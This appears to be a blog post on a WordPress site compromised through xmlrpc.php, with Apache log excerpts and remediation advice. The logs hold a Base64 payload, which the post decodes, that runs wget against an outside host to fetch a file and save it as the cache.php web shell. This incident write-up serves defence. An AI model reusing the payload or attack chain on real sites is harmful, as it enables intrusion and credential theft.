WordPress xmlrpc.php flaw exploited to install a “WSO 2.1 Web Shell by oRb”

Below you can see in the copy of the apache logs how the Russian exploiter first creates an account on the exploitable wordpress system. It is useful to disable automated registrations on your wordpress system. However sometimes you want this to be open if you have a forum installed on your wordpress system.

95.52.64.98 – – [30/Oct/2010:17:10:49 +0200] “POST /wp-login.php?action=register HTTP/1.1” 302 20 “http://www……..org/wp-login.php?action=register” “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)”

95.52.64.98 – – [30/Oct/2010:17:11:17 +0200] “POST /wp-login.php HTTP/1.0” 302 – “http://www…….org/wp-login.php” “Opera”

After logging in you can see how the cracker installs his remote shell remotely from another compromised website by abusing an exploit in xmlrpc.php file.

95.52.64.98 – – [30/Oct/2010:17:11:20 +0200] “POST /xmlrpc.php HTTP/1.0” 200 4366 “cHJpbnQgJzxtYWdpY19zZW9fdG9vbHo+JztwYXNzdGhydSgid2dldCBodHRwOi8vd3d3LmVkdHV0b3JpYWwubmV0L3dfb2xkLnR4dDsgbXYgd19vbGQudHh0IGNhY2hlLnBocDsgbHMgLWFsOyBwd2QiKTtleGl0Ow==” “Opera”

95.52.64.98 – – [30/Oct/2010:17:11:22 +0200] “POST /wp-admin//options-permalink.php HTTP/1.0” 200 9491 “http://www…….org/wp-admin//options-permalink.php” “Opera”

You can read that the xmlrpc.php is injected with Base64 encoded input. If you decode the Base64 encoded string it reads something like this:

print ‘<magic_seo_toolz>’;passthru(“wget http://www.edtutorial.net/w_old.txt; mv w_old.txt cache.php; ls -al; pwd”);exit;

This is php code to retrieve a remotely hosted file w_old.txt and renaming it to cache.php file on the server.

cache.php is the name of the remote web shell you can access this file yourself if no password has been set by the cracker. Main issue with this shell is that the wp-config.php is readable as text so your database username and password are compromised, you must change your password after you fixed the issue!

95.52.64.98 – – [30/Oct/2010:17:12:14 +0200] “POST /cache.php HTTP/1.1” 200 4510 “/cache.php” “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)”

How was this possible? First of all the webroot directory had the wrong permissions 777 and second the wordpress installation was one year old and had some XML-RPC exploitable issues.

How to fix this once your site has been compromised?

1. The permissions of the webroot must be changed to 755.
2. Then the wordpress installation must be deleted and a whole new install must be copied to the server.  Be sure to retain a copy of the web shell for your hosting security officer.
3. After this the password of the wordpress database username has to be changed.
4. The wordpress database must be restored from a backup so any spam links injected since the crack are removed.
5. The wordpress database must be upgraded, can be done by the admin via wp-admin.
6. Last but not least the whole shared server had to be scanned for any extra shells owned by user www-data, httpd or user apache depending on the operating system. So if you are hosted on a shared hosting platform you must inform your security officer that your wordpress installation was compromised so he/she can perform a security check of the server.
7. Backup, backup, backup! Be sure to always have multiple backups of your wordpress database on your own pc. This exploit is mostly abused by blackhat SEO companies to spamvertise their websites via your RSS feed and having a “clean” backup will save you a lot of time.